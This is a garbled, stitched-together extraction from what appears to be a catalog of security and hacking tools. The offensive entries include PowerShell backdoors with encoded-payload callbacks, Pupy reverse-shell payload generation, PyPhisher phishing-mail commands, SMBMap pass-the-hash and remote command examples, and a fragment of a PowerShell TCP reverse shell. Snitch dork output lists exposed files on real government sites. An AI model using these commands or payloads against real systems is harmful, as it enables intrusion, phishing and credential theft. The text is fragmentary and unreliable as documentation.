and is not a silver bullet when it comes to cover
communications.
Helper Functions:
Add-PSFirewallRules - Adds powershell to the firewall on
65K ports. Required Admin
Invoke-CallbackIEX - The location for the various
callback mechanisms. Calls back and executes encoded
payload.
Backdoors Available:
Invoke-EventLogBackdoor: Monitors for failed RDP login
attempts. Admin-Yes, Firewall-No, Auditing Reqd
Invoke-PortBindBackdoor: Binds to TCP Port. Admin-No,
Firewall-Yes
Invoke-ResolverBackdoor: Resolves name to decide when to
callback. Admin-No, Firewall-No
Invoke-PortKnockBackdoor: Starts sniffer looking for
PowerPick
This project focuses on allowing the execution of Powershell
functionality without the use of Powershell.exe. Primarily this
project uses.NET assemblies/libraries to start execution of the
Powershell scripts.
Many thanks to those in the offensive powershell community.
This work is not ground breaking but hopefully will motivate
offense and defense to understand the implications and lack of
protections available.
PSInject.ps1
the callback URL that is hard coded into the DLL. See this
script for more details.
The script that it calls back for must be base64 encoded. To do
this, you can simply use the built in linux utility 'base64'.
Example:
import-module psinject.ps1
Invoke-PSInject -Verbose -ProcID 0000 -CBURL http://
1.1.1.1/favicon.ico
ReflectivePick
PewPewPew
This repo contains scripts that utilize a common pattern to host
a script on a PowerShell webserver, invoke the IEX download
cradle to download/execute the target code and post the results
back to the server, and then post-process any results.
More details here
PowerView
PowerView is a PowerShell tool to gain network situational
awareness on Windows domains. It contains a set of purePowerShell replacements for various windows "net *"
commands, which utilize PowerShell AD hooks and underlying
Win32 API functions to perform useful Windows domain
functionality.
It also impements various useful metafunctions, including some
custom-written user-hunting functions which will identify where
on the network specific users are logged into. It can also check
Misc Functions:
Export-PowerViewCSV
thread-safe CSV
append
Set-MacAttribute
resolves a hostname
tests connectivity to
converts a given
to an IP
Test-Server
a specified server
Convert-NameToSid
Convert-SidToName
converts a security
converts a user/group
enumerates local
proxy settings
Get-PathAcl
returns all
returns all
search a local or
adds an ACL to a
enumerate -1000+
net * Functions:
Get-NetDomain
adds a local or
domain user
Get-NetComputer
current servers in the domain
Get-NetPrinter
gets registered
organization units
Get-NetSite
a domain
Get-NetSubnet
subnets for a domain
Get-NetGroup
current groups in a domain
Get-NetGroupMember
adds a local or
gets share
GPO functions
Get-GptTmpl
parses a GptTmpl.inf
to a custom object
Get-NetGPO
for a given domain
Get-NetGPOGroup
takes a user/group
domain or DC policy
User-Hunting Functions:
Invoke-UserHunter
try to build a
MetaFunctions:
Invoke-ShareFinder
finds (non-standard)
finds potentially
Find-UserField
searches a computer
enumerates members of
Download PowerTools
PROGUARD - JAVA CLASS FILE SHRINKER, OPTIMIZER,
OBFUSCATOR AND PREVERIFIER
WHAT IS SHRINKING?
DownloadProGuard
PROJECT ARTILLERY - FULL SUITE FOR PROTECTION
AGAINST ATTACK ON LINUX AND WINDOWS
For those technical folks you can find all of the code in the
following structure:
src/core.py - main central code reuse for things shared
between each module
src/monitor.py - main monitoring module for changes to
the filesystem
brute forcing
Supported platforms
Linux
Windows
DownloadProject Artillery
PROXENET - HACKER FRIENDLY PROXY FOR WEB
APPLICATION PENETRATION TESTS
this is what you are looking for, here are a few links for you:
ZAP
Burp
ProxyStrike
Or the best way, write your own GUI as a proxenet plugin!
Why ?
SSL
Full SSL interception (internal CA)
SSL client certificate authentication
IPv4/IPv6
HTTP Proxy forwarding
White-list/Black-list hosts filtering
Command interface out-of-band
Nice TTY colors :D
100% Open-Source
... and more !
The best of both world ?
DownloadProxenet
PROXYDROID - SET PROXYS (HTTP / SOCKS4 / SOCKS5)
ON YOUR ANDROID DEVICES
ProxyDroid is an app that can help you to set the proxy (http /
socks4 / socks5) on your android devices.
FEATURES
1.
2.
3.
4.
5.
DowbloadProxyDroid
PUPY - MULTI-PLATFORM REMOTE ADMINISTRATION
TOOL
Pupy is an opensource, multi-platform Remote Administration
Tool written in Python. On Windows, Pupy uses reflective dll
injection and leaves no traces on disk.
Features :
Implemented Modules :
Quick start
In these examples the server is running on a linux host (tested
on kali linux) and it's IP address is 192.168.0.1
The clients have been tested on (Windows 7, Windows XP, kali
linux, ubuntu, Mac OS X 10.10.5)
generate/run a payload
for Windows
./genpayload.py 192.168.0.1 -p 443 -t exe_x86 -o
pupyx86.exe
for MAC OS X
easy_install rpyc #(or manually copy it if you are not
admin)
python reverse_ssl.py 192.168.0.1:443
Some screenshots
help
interactive shell
t.start()
then, simply create a module to load our package and call the
function remotely
class MsgBoxPopup(PupyModule):
""" Pop up a custom message box """
def init_argparse(self):
self.arg_parser =
PupyArgumentParser(prog="msgbox",
description=self.__doc__)
self.arg_parser.add_argument('--title',
help='msgbox title')
self.arg_parser.add_argument('text', help='text
to print in the msgbox :)')
@windows_only
def is_compatible(self):
pass
def run(self, args):
self.client.load_package("pupwinutils.msgbox")
self.client.conn.modules['pupwinutils.msgbox'].MessageBox
(args.text, args.title)
self.log("message box popped !")
Dependencies
rpyc (https://github.com/tomerfiliba/rpyc)
DownloadPupy
PYERSINIA - NETWORK ATTACK TOOL
WHAT'S NEW?
Adding new attacks on the tool is a simple task because we
use the framework STB (Security Tool Builder). The new
INSTALLATION
Install pyersinia is so easy:
$ python -m pip install pyersinia
QUICK START
You can display inline help writing:
positional arguments:
arp_spoof_TARGET
arp_spoof_VICTIM
optional arguments:
-h, --help
-v, --verbosity
verbosity level
-a ATTACK_TYPE
-i IFACE
supported attacks:
arp_spoof, dhcp_discover_dos, stp_tcn, stp_conf,
stp_root
examples:
python pyersinia.py -a arp_spoof 127.0.0.1
127.0.0.1
python pyersinia.py -a stp_root -i eth0
Download Pyersinia
PYPHISHER - A SIMPLE PYTHON TOOL FOR PHISHING
If you are looking to make a phishing testing or demonstration
you can check PyPhisher. This tool was created for the
purpose of phishing during a penetration test. This tool is
python based that provide user a way to send emails with a
customized template that he design. you can have an html
format that is similar to any organization and replace the links
that you want to send.
This was inspired by SpearPhiser beta by Dave Kennedy from
Trustedsec and a feature found in Cobalt Strike by Rapheal
Mudge from Strategic Cyber
Usage:
PyPhisher.py --server mail.server.com --port 25 -username user --password password --html phish.txt -url_replace phishlink.com --subject Read!! --sender
important@phish.com --sendto target@company.com
Available options:
--server
--html
in the email
--url_replace
--sender
email example
--sendto
Download PyPhisher
Q-SHELL - QUICK SHELL FOR UNIX ADMINISTRATOR
q-shell is quick shell for remote login into Unix system, it use
blowfish crypt algorithm to protect transport data from client to
server, you can get two program: 'qsh' for client, and 'qshd' for
server, those program can rename by any name with you
prefer.
Compile
1. server:
Just run qshd on server:
$ ./qshd
2.
$ export PATH=.:$PATH
4.
$ smbd
5.
6. client:
Set some environment variable, then run qsh:
$ export _IP=127.0.0.1
7.
$ export _PORT=2800
8.
$ unset _P
9.
$ ./qsh shell
10.
/path/to/server/file
3.
export _IP=192.168.0.$i
10.
export _PORT=2800
11.
export _P=key
12.
13.
# set key
done
14.
Download Q-shell
QARK - TOOL TO LOOK FOR SEVERAL SECURITY
RELATED ANDROID APPLICATION VULNERABILITIES
qark/sampleApps/goatdroid/goatdroid/AndroidManifest.xml
--exploit 1 --install 1
The sampleApps folder contains sample APKs that you can test
against QARK
Requirements
python 2.7.6
JRE 1.6+ (preferably 1.7+)
OSX or Ubuntu Linux (Others may work, but not fully
tested)
Documentation
Roadmap
DownloadQARK
RAWR - RAPID ASSESSMENT OF WEB RESOURCES
Features
A customizable CSV containing ordered information
gathered for each host, with a field for making notes/etc.
Input
Using NMap
RAWR accepts valid NMap input strings (CIDR, etc)
as an argument
-i can be used to feed it a line-delimited list.
Enumeration
--dns will have it query Bing for other hostnames and add
them to the queue.
(Planned) If IP is non-routable, RAWR will request an
AXFR using 'dig'
This is for external resources - non-routables are
skipped.
Results are cached for the duration of the scan to
prevent unneeded calls.
Crawl the site with --spider, notating files and docs in the
log directory's 'maps' folder.
Defaults: [conf/settings.py] follow subdomains, 3
links deep, timeout at 3min, limit to 300 urls
If graphviz and python-graphviz are installed, it will
create a PNG diagram of each site that is crawled.
Start small and make adjustments outward in respect
to your scanning environment. Please use caution to
avoid trouble. :)
Output
Report Customization
Give your HTML report a custom logo and title with -logo=<file> and --title=<title>.
The image will be copied into the report folder.
Click 'printable' in the HTML report to view the
custom header.
Updating
DownloadRAWR
REKALL - THE MOST COMPLETE MEMORY ANALYSIS
FRAMEWORK
OSX 10.6-10.8.
install
Jinja2
MarkupSafe
Pygments
astroid
pyzmq
tornado wsgiref
DownloadRekall
REMNUX V6 - A LINUX TOOLKIT FOR REVERSEENGINEERING AND ANALYZING MALWARE
analyzing Windows and Linux malware, examining browserbased threats such as obfuscated JavaScript, exploring
suspicious document files and taking apart other malicious
artifacts. Investigators can also use the distro to intercept
suspicious network traffic in an isolated lab when performing
behavioral malware analysis.
Malware Analyis Tools Installed on REMnux
DownloadREMnux v6
REMOTE DLL INJECTOR V2.0 - COMMAND-LINE TOOL TO
<pid>
<dll_file_path>
-h
<pid>
Inject DLL
<dll_file_path>
Examples of RemoteDLLInjector
//Show the help screen
RemoteDLLInjector.exe -h
//Inject DLL into 32-bit process with pid 1551
RemoteDLLInjector32.exe 1551 "c:\my project\inject32.dll"
//Inject DLL into 64-bit process with pid 1001
RemoteDLLInjector64.exe 1001 "c:\inject64.dll"
Download REXT
ROUTERCHECK - ANDROID APP FOR ENSURE THE
SAFETY OF YOUR ROUTER
there are any known problems. It will also perform some of the
same tests that hackers use to see how your router will
respond.
Open Ports
When RouterCheck finds that there are any problems with your
router, it willhelp guide you towards the stepsyou must take to
DownloadRouterCheck
RUBOCOP - A RUBY STATIC CODE ANALYZER, BASED
ON THE COMMUNITY RUBY STYLE GUIDE
Installation
RuboCop 's installation is pretty standard:
$ gem install rubocop
Basic Usage
Running rubocop with no arguments will check all Ruby source
files in the current directory:
$ rubocop
def badName
^^^^^^^
test.rb:2:3: C: Use a guard clause instead of wrapping
the code inside a conditional expression.
if something
^^
test.rb:2:3: C: Favor modifier if usage when having a
single-line body. Another good alternative is the usage
of control flow &&/||.
if something
^^
test.rb:4:5: W: end at 4, 4 is not aligned with if at 2,
2
end
^^^
1 file inspected, 4 offenses detected
Comm
and
flag
Description
-v/-versi
on
-V/-verbo
seversi
on
-L/-listtarge
tfiles
-F/-failfast
-C/-cache
-d/-debug
-D/-displ
aycopnames
-c/-confi
g
-f/-forma
t
Choose a formatter.
-o/-out
-r/-requi
re
-R/-rails
-l/-lint
-a/-autocorre
ct
-only
-excep
t
-autogenconfi
g
-exclu
delimit
Limit how many individual files --auto-genconfig can list in Exclude parameters, default is
15.
-showcops
-faillevel
-s/-stdin
Cops
Configuration
The behavior of RuboCop can be controlled via
the .rubocop.yml configuration file. It makes it possible to
enable/disable certain cops (checks) and to alter their behavior
if they accept any parameters. The file can be placed either in
your home directory or in some project directory.
RuboCop will start looking for the configuration file in the
directory where the inspected file is and continue its way up to
the root directory.
The file has the following format:
inherit_from: ../.rubocop.yml
Style/Encoding:
Enabled: false
Metrics/LineLength:
Max: 99
Inheritance
the value:
inherit_gem:
rubocop: config/default.yml
my-shared-gem: .rubocop.yml
cucumber: conf/rubocop.yml
Defaults
Exclude:
- 'db/**/*'
- 'config/**/*'
- 'script/**/*'
- !ruby/regexp /old_and_unused\.rb$/
# other configuration
# ...
Cops can also exclude only specific sets of files when that's
needed (for instance you might want to run some cop only on a
specific file). All cops support theExclude param.
Rails/DefaultScope:
Exclude:
- app/models/problematic.rb
All cops are then disabled by default, and only cops appearing
in user configuration files are enabled. Enabled: true does
not have to be set for cops in user configuration. They will be
enabled anyway.
Severity
Each cop has a default severity level based on which
department it belongs to. The level is warning for Lint and
convention for all the others. Cops can customize their
severity level. Allowed params are refactor , convention ,
warning , error and fatal .
There is one exception from the general rule above and that is
Lint/Syntax , a special cop that checks for syntax errors
before the other cops are invoked. It can not be disabled and its
severity ( fatal ) can not be changed in configuration.
Metrics/CyclomaticComplexity:
Severity: warning
AutoCorrect
Cops that support the --auto-correct option can have that
support disabled. For example:
Style/PerlBackrefs:
AutoCorrect: false
One or more cops can be disabled on a single line with an endof-line comment.
for x in (0..19) # rubocop:disable Style/AvoidFor
Formatters
You can change the output format of RuboCop by specifying
formatters with the -f/--format option. RuboCop ships with
several built-in formatters, and also you can create your custom
formatter.
Additionally the output can be redirected to a file instead of
$stdout with the -o/--out option.
Some of the built-in formatters produce machine-parsable
output and they are considered public APIs. The rest of the
formatters are for humans, so parsing their outputs is
discouraged.
You can enable multiple formatters at the same time by
specifying -f/--format multiple times. The -o/--out option
applies to the previously specified -f/--format , or the default
progress format if no -f/--format is specified before the o/--out option.
# Simple format to $stdout.
$ rubocop --format simple
# Progress (default) format to the file result.txt.
$ rubocop --out result.txt
# Both progress and offense count formats to $stdout.
# The offense count formatter outputs only the final
summary,
# so you'll mostly see the outputs from the progress
formatter,
# and at the end the offense count summary will be
outputted.
~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~
#
|_______________|
$stdout
~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~
#
#
|
default format
|
$stdout
comment.
class Foo
^^^^^
...
26 files inspected, 46 offenses detected
end
^^^
1 file inspected, 4 offenses detected
ETA: 00:00:02
Machine-parsable
The emacs formatter displays the offenses in a format suitable
for consumption by Emacs (and possibly other tools).
$ rubocop --format emacs test.rb
/Users/bozhidar/projects/test.rb:1:1: C: Use snake_case
for methods and variables.
/Users/bozhidar/projects/test.rb:2:3: C: Favor modifier
if/unless usage when you have a single-line body. Another
good alternative is the usage of control flow &&/||.
/Users/bozhidar/projects/test.rb:4:5: W: end at 4, 4 is
Simple Formatter
1:
C:
2:
2:
4:
Machine-parsable
Sometimes you might want to just open all files with offenses in
your favorite editor. This formatter outputs just the names of the
files with offenses in them and makes it possible to do
something like:
$ rubocop --format files | xargs vim
JSON Formatter
Machine-parsable
You can get RuboCop's inspection result in JSON format by
passing --format json option in command line. The JSON
structure is like the following example:
{
"metadata": {
"rubocop_version": "0.9.0",
"ruby_engine": "ruby",
"ruby_version": "2.0.0",
"ruby_patchlevel": "195",
"ruby_platform": "x86_64-darwin12.3.0"
},
"files": [{
"path": "lib/foo.rb",
"offenses": []
}, {
"path": "lib/bar.rb",
"offenses": [{
"severity": "convention",
"message": "Line is too long. [81/80]",
"cop_name": "LineLength",
"corrected": true,
"location": {
"line": 546,
"column": 80,
"length": 4
}
}, {
"severity": "warning",
"message": "Unreachable code detected.",
"cop_name": "UnreachableCode",
"corrected": false,
"location": {
"line": 15,
"column": 9,
"length": 10
}
}
]
}
],
"summary": {
"offense_count": 2,
"target_file_count": 2,
"inspected_file_count": 2
}
}
Documentation
12
DotPosition
AvoidGlobalVars
EmptyLines
AssignmentInCondition
Blocks
CommentAnnotation
BlockAlignment
IndentationWidth
AvoidPerlBackrefs
ColonMethodCall
-134
Total
HTML Formatter
Compatibility
RuboCop supports the following Ruby implementations:
MRI 1.9.3
MRI 2.0
MRI 2.1
MRI 2.2
JRuby in 1.9 mode
Rubinius 2.0+
Editor integration
Emacs
Brackets.
TextMate2
Here's one great opportunity to contribute to RuboCop implement RuboCop integration for your favorite editor.
Guard integration
If you're fond of Guard you might like guard-rubocop . It allows
you to automatically check Ruby code style with RuboCop
when files are modified.
Rake integration
To use RuboCop in your Rakefile add the following:
require 'rubocop/rake_task'
RuboCop::RakeTask.new
# Run
RuboCop
rake rubocop:auto_correct
# Auto-
Caching
Large projects containing hundreds or even thousands of files
can take a really long time to inspect, but RuboCop has
functionality to mitigate this problem. There's a caching
mechanism that stores information about offenses found in
inspected files.
Cache Validity
will be done if the cache for the file is still valid, which it is if
there are no changes in:
the contents of the inspected file
RuboCop configuration for the file
the options given to rubocop , with some exceptions that
have no bearing on which offenses are reported
the Ruby version used to invoke rubocop
version of the rubocop program (or to be precise,
anything in the source code of the invoked rubocop
program)
Enabling and Disabling the Cache
Each time a file has changed, its offenses will be stored under
a new key in the cache. This means that the cache will continue
to grow until we do something to stop it. The configuration
parameter AllCops: MaxFilesInCache sets a limit, and when
the number of files in the cache exceeds that limit, the oldest
Extensions
It's possible to extend RuboCop with custom cops and
formatters.
Loading Extensions
Besides the --require command line option you can also
RuboCop::Formatter::BaseFormatter
RuboCop::Cop::Offense
Parser::Source::Range
Download Rubocop
SECURITY CHEATSHEETS - A COLLECTION OF
CHEATSHEETS FOR VARIOUS INFOSEC TOOLS AND
TOPICS
How to Use
CheatSheets:
aircrack-ng
cewl
cidr
cookies
dig
fierce
ftp
http
https-ssl-tls
hydra
john
maltego
markdown
medusa
metasploit
mysql
ncat
nikto
nping
permissions
php
pivoting
ps
python
ruby
shadow
shodan
sqlmap
tcpdump
webservervulns
wireless-encryptions
wireshark
DownloadSecurity CheatSheets
Pivot between multiple data types with Sguil and send pcaps to
Wireshark and NetworkMiner
Easy updates
Data Types
DownloadSecurity Onion
SECURITYSOFTVIEW - DISPLAYS THE ANTIVIRUS /
ANTISPYWARE / FIREWALL REGISTERED WITH THE
SECURITY CENTER OF WINDOWS
/stext
<Filename>
/stab
<Filename>
/scomma
<Filename>
/stabular
<Filename>
/shtml
<Filename>
/sverhtml
<Filename>
/sxml
<Filename>
Download SecuritySoftView
SENTRY - BRUTEFORCE ATTACK BLOCKER (SSH, FTP,
SMTP, AND MORE)
least once. Never again will that forgetful colleague behind the
office NAT router get us locked out of our system. Nor the
admin whose script just failed to login 12 times in 2 seconds.
Sentry includes support for adding IPs to a firewall. Support for
IPFW, PF, ipchains is included. Firewall support is disabled by
default. This is because firewall rules may terminate existing
session(s) to the host (attn IPFW users). Get your IPs
whitelisted (connect 3x or use --whitelist) before enabling the
firewall option.
SIMPLE
Sentry has an extremely simple database for tracking IPs. This
makes it very easy for administrators to view and manipulate
the database using shell commands and scripts. See the
EXAMPLES section.
Sentry is written in perl, which is installed everywhere you find
sshd. It has no dependencies. Installation and deployment is
extremely simple.
FLEXIBLE
Sentry supports blocking connection attempts using
tcpwrappers and several popular firewalls. It is easy to extend
sentry to support additional blocking lists.
Sentry was written to protect the SSH daemon but anticipates
use with other daemons. SMTP support is planned. As this was
written, the primary attack platform in use is bot nets comprised
of exploited PCs on high-speed internet connections. These
bots are used for carrying out SSH attacks as well as spam
delivery. Blocking bots prevents multiple attack vectors.
The programming style of sentry makes it easy to insert code
for additonal functionality.
EFFICIENT
The primary goal of Sentry is to minimize the resources an
attacker can steal, while consuming minimal resources itself.
Most bruteforce blocking apps (denyhosts, fail2ban, sshdfilter)
expect to run as a daemon, tailing a log file. That requires a
language interpreter to always be running, consuming at least
10MB of RAM. A single hardware node with dozens of virtual
servers will lose hundreds of megs to daemon protection.
Sentry uses resources only when connections are made. The
worse case scenario is the first connection made by an IP,
since it will invoke a perl interpreter. For most connections,
Sentry will append a timestamp to a file, stat for the presense of
another file and exit.
Once an IP is blacklisted for abuse, whether by tcpd or a
firewall, the resources it can consume are practically zero.
Sentry is not particularly efficient for reporting. The "one file per
IP" is superbly minimal for logging and blacklisting, but nearly
any database would perform better for reporting. Expect to wait
a few seconds for sentry --report.
REQUIRED ARGUMENTS
ip
An IPv4 address. The IP should come from a reliable
source that is difficult to spoof. Tcpwrappers is an
excellent source. UDP connections are a poor source as
they are easily spoofed. The log files of TCP daemons can
be good source if they are parsed carefully to avoid log
injection attacks.
ACTIONS
blacklist
deny all future connections
whitelist
whitelist all future connections, remove the IP from the
blacklists, and make it immune to future connection tests.
delist
remove an IP from the white and blacklists. This is useful
for testing that sentry is working as expected.
connect
register a connection by an IP. The connect method will
log the attempt and the time. See CONNECT.
update
Check the most recent version of sentry against the
installed version and update if a newer version is
available.
EXAMPLES
IP REPORT
$ /var/db/sentry/sentry.pl -r --ip=24.19.45.95
9 connections from 24.19.45.95
and it is whitelisted
$ /var/db/sentry/sentry.pl -r
-------- summary --------1614 unique IPs have connected 76525 times
1044 IPs are blacklisted
18 IPs are whitelisted
DownloadSentry
SET V6.5 - THE SOCIAL-ENGINEER TOOLKIT MR ROBOT
Supported platforms
Linux
Windows (experimental)
DownloadSET v6.5
SHELLCHECK - AUTOMATICALLY DETECTS PROBLEMS
WITH SH/BASH SCRIPTS AND COMMANDS
Build Materials
simp-core
simp-doc
simp-rsync
Puppet Modules
pupmod-simp-acpid
pupmod-simp-activemq
pupmod-simp-aide
pupmod-simp-apache
pupmod-simp-auditd
pupmod-simp-autofs
pupmod-simp-backuppc
pupmod-simp-cgroups
pupmod-simp-clamav
pupmod-simp-common
pupmod-simp-concat
pupmod-simp-dhcp
pupmod-simp-elasticsearch
pupmod-simp-freeradius
pupmod-simp-functions
pupmod-simp-ganglia
pupmod-simp-gfs2
pupmod-simp-iptables
pupmod-simp-jenkins
pupmod-simp-kibana
pupmod-simp-krb5
pupmod-simp-libvirt
pupmod-simp-logrotate
pupmod-simp-logstash
pupmod-simp-mcafee
pupmod-simp-mcollective
pupmod-simp-mozilla
pupmod-simp-multipathd
pupmod-simp-named
pupmod-simp-network
pupmod-simp-nfs
pupmod-simp-nscd
pupmod-simp-ntpd
pupmod-simp-oddjob
pupmod-simp-openldap
pupmod-simp-openscap
pupmod-simp-pam
pupmod-simp-pki
pupmod-simp-polkit
pupmod-simp-postfix
pupmod-simp-pupmod
pupmod-simp-rsync
pupmod-simp-rsyslog
pupmod-simp-site
pupmod-simp-selinux
pupmod-simp-shinken
pupmod-simp-simp
pupmod-simp-snmpd
pupmod-simp-ssh
pupmod-simp-sssd
pupmod-simp-stunnel
pupmod-simp-sudo
pupmod-simp-sudosh
pupmod-simp-svckill
pupmod-simp-sysctl
pupmod-simp-tcpwrappers
pupmod-simp-tftpboot
pupmod-simp-tpm
pupmod-simp-upstart
pupmod-simp-vnc
pupmod-simp-vsftpd
pupmod-simp-windowmanager
pupmod-simp-xinetd
pupmod-simp-xwindows
rubygem-simp-rake-helpers
rubygem-simp-cli
augeasproviders_apache
augeasproviders_base
augeasproviders_core
augeasproviders_grub
augeasproviders_mounttab
augeasproviders_nagios
augeasproviders_pam
augeasproviders_postgresql
augeasproviders_puppet
augeasproviders_shellvar
augeasproviders_ssh
puppet-elasticsearch
puppetlabs-apache
puppetlabs-postgresql
puppetlabs-stdlib
puppetlabs-inifile
puppetlabs-puppetdb
puppetlabs-mysql
puppetlabs-java
puppet-gpasswd
augeasproviders_sysctl
puppet-datacat
puppetlabs-java_ks
puppet-memcached
Download SIMP
SMARTSNIFF V2.16 - CAPTURE TCP/IP PACKETS ON
YOUR NETWORK ADAPTER
SYSTEM REQUIREMENTS
DownloadSmartSniff v2.16
SMARTSNIFF V2.17 - CAPTURE TCP/IP PACKETS ON
YOUR NETWORK ADAPTER
Using SmartSniff
Display only TCP and UDP packets that use the following
port range: 53 - 139:
include:both:tcpudp:53-139
0A - (4 bytes) IP Address
Header of each packet:
00 (2 Bytes) packet header size (currently 0x18 bytes)
02 (4 Bytes) number of received bytes in packet.
06 (8 Bytes) Packet time in Windows FILETIME format.
0E (6 Bytes) Source Mac Address.
14 (6 Bytes) Dest. Mac Address.
1A The remaining bytes are the TCP/IP packet itself.
DownloadSmartSniff v2.17
SMARTTY - MULTI-TABBED SSH CLIENT WITH SCP
SUPPORT
DownloadSmarTTY
Pass-the-Hash Support
File upload/download/delete
Permission enumeration (writable share, meet Metasploit)
Remote Command Execution
Help
SMBMap - Samba Share Enumerator | Shawn Evans ShawnDEvans@gmail.com
optional arguments:
-h, --Help
Main arguments:
-H HOST
IP of host
--host-file FILE
-u USERNAME
assumed
-p PASSWORD
-s SHARE
'C$'
-d DOMAIN
-P PORT
Command Execution:
Options for executing commands on the specified host
-x COMMAND
r'
Filesystem Search:
Options for searching/enumerating the filesystem of the
specified host
-L
host
-R [PATH]
C:\Users), ex 'D:\HR\'
Filesystem interaction:
Options for interacting with the specified host's
filesystem
--download PATH
system,
ex.'C$\temp\passwords.txt'
--upload SRC DST
system ex.
'/tmp/payload.exe C$\temp
\payload.exe'
--delete PATH TO FILE
Delete a remote file, ex. 'C$
\temp\msf.exe'
--skip
prompt
Examples:
$ python smbmap.py -u jsmith -p password1 -d workgroup -H
192.168.0.1
$ python smbmap.py -u jsmith -p
'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111ae
f4a50a94d' -H 172.16.0.20
$ python smbmap.py -u 'apadmin' -p 'asdf1234!' -d ACME -H
10.1.3.30 -x 'net group "Domain Admins" /domain'
Default Output:
$
p 'R33nisP!nckl3' -d ABC
Name: unkown
ADMIN$
READ, WRITE
C$
READ, WRITE
Command execution:
$ python smbmap.py -u ariley -p 'P@$$w0rd1234!' -d ABC -x
'net group "Domain Admins" /domain' -H 192.168.2.50
[+] Finding open SMB ports....
[+] User SMB session establishd...
[+] IP: 192.168.2.50:445
Name: unkown
Group name
Domain Admins
Comment
Members
-----------------------------------------------------------------------------abcadmin
The command completed successfully.
.Users
dw--w--w-2015
.
dw--w--w--
2015
..
dr--r--r--
Administrator
dr--r--r--
0 Thu Apr
9 14:46:57 2015
0 Thu Apr
9 14:46:49 2015
0 Thu Apr
9 14:46:57 2015
9 14:44:01 2015
0 Thu Apr
9 14:46:49 2015
All Users
dw--w--w-Default
dr--r--r-Default User
fr--r--r-desktop.ini
dw--w--w-Public
dr--r--r--
wingus
\861d4cd845124cad95d42175.txt
[+] Grabbing search results, be patient, share drives
tend to be big...
[+] Job 1 of 1 completed
[+] All jobs complete
Host: 192.168.1.203
Pattern: password
C:\Users\wingus\AppData\Roaming\Mozilla\Firefox\Profiles
\35msadwm.default\logins.json
C:\Users\wingus\AppData\Roaming\Mozilla\Firefox\Profiles
\35msadwm.default\prefs.js
Drive Listing:
\\vboxsrv\Public
VirtualBox Shared
Folders
Nifty Shell:
$c=New-Object system.net.sockets.tcpclient;$c.connect($a,
$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[]
$c.ReceiveBufferSize
;$p=New-Object
System.Diagnostics.Process
$p.StartInfo.FileName=""""cmd.exe""""
$p.StartInfo.RedirectStandardInput=1
;
;
$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShe
llExecute=0
;$p.Start()
$p.StandardOutput
;$is=$p.StandardInput
;Start-Sleep 1
System.Text.AsciiEncoding
;$os=
;$e=new-object
+= $e.GetString($os.Read())} $s.Write($e.GetBytes($out),
0,$out.Length)
;$out=$null;$done=$false;while (-not
$out=
$s.Write($e.GetBytes($out),
Name: unkown
All rights
reserved.
C:\Windows\system32>whoami
nt authority\system
Download SMBMap
SN1PER - AUTOMATED PENTEST RECON SCANNER
Sn1per is an automated scanner that can be used during a
penetration test to enumerate and scan for vulnerabilities.
Features
Install
chmod +x install.sh
./install.sh
./sn1per
SAMPLE REPORT:
https://gist.githubusercontent.com/1N3/070d14c364e5f23bfe5e/
raw/8e152e740ba50cd49bb3366ec91cf7d08ca02715/Sn1per
%2520Sample%2520Report
Download Sn1per
SNIFFLY - SNIFFING BROWSER HISTORY USING HSTS +
CSP.
How it works
where 1 batch is 100 sites. You can override util/stricttransport-security.txt with a different list, such as the full
Alexa Top 1M, if you want.
To process and sort the results by max-age, excluding ones
with max-age less than 1 day and ones that are preloaded:
$ cd util
Once that's done, you can copy the hosts from processed.log
into src/index.js .
Running sploitz
Visiting file:///path/to/sniffly/src/index.html in
Chrome should just work. In Firefox, CSP headers using the
tag are apparently not supported yet, so you need to set up a
local webserver to serve the CSP HTTP response header. My
Nginx server block looks something like this:
server {
listen 8081;
server_name localhost;
location / {
root /path/to/sniffly/src;
add_header Content-Security-Policy "img-src
http:";
index index.html;
}
}
Or in .htaccess :
<IfModule mod_headers.c>
Header set Content-Security-Policy "img-src http:"
</IfModule>
header('Content-Security-Policy: '.$csp_rules);
?>
Caveats
Acknowledgements
Download Sniffly
SNIFFPASS - PASSWORD MONITORING/SNIFFING
SOFTWARE (WEB/FTP/EMAIL)
Description
/
NoCapD
river
/NoReg
DownloadSniffPass
SNITCH - INFORMATION GATHERING VIA DORKS
__
(_) /______/ /_
) / / / / /_/ /__/ / / /
-U [url], --url=[url]
domain(s) or domain extension(s)
separated by comma *
-D [type], --dork=[type]
dork type(s) separated by comma *
-O [file], --output=[file]
output file
-S [ip:port], --socks=[ip:port]
socks5 proxy
-I [seconds], --interval=[seconds]
interval between requests, 2s by
default
-P [pages], --pages=[pages]
pages to retrieve, 10 by default
-v
turn on verbosity
Dork types:
info
ext
| Sensitive extensions
docs
| Web software
all
| All
Examples:
snitch.py -I5 -P3 --dork=ext,info -U gov -S
127.0.0.1:9050
snitch.py --url=site.com -D all -O /tmp/dorks
https://tcga-data.nci.nih.gov/docs/index.html.bak
https://software.sandia.gov/trac/canary/attachment/
ticket/3917/Pike_Hach%26SCAN_Oracle.edsx_convert.log
http://www.glerl.noaa.gov/metdata/2check_all.log
http://ft.ornl.gov/eavl/regression/configure.log
http://airsar.jpl.nasa.gov/airdata/PRECISION_LOG/
hd1883.log
http://www.antd.nist.gov/pubs/
Sriram_BGP_IEEE_JSAC.pdf.old
http://www-esh.fnal.gov/pls/default/itna.log
http://www.lanl.gov/wrtout/projects/tscattering/nano/
Output//Defaults/ellipsoid.log
http://maine.gov/REVENUE/netfile/WS_FTP.LOG
http://mls.jpl.nasa.gov/lay/UARS_MLS.LOG
http://airsar.jpl.nasa.gov/airdata/PRECISION_LOG/
hd1469.log
http://www.modot.mo.gov/_baks/indexalt.htm.0001.b041.bak
ftp://ftp.hrsa.gov/ruralhealth/FY04RAEDGuidance.pdf.bak
https://www.health.ny.gov/health_care/medicaid/
nyserrcd.ini
http://www.thruway.ny.gov/business/contractors/expedite/
bid.ini
http://www.star.bnl.gov/~pjakl/documents/
configuration.cfg
http://www.wpc.ncep.noaa.gov/html/ecmwf0012loop500_ak.cfg
https://fermilinux.fnal.gov/documentation/security/
krb5.conf
http://mirror.pnl.gov/macports/release/ports/security/
fail2ban/files/pf-icefloor.conf
https://svn.mcs.anl.gov/repos/ZeptoOS/trunk/BGP/ramdisk/
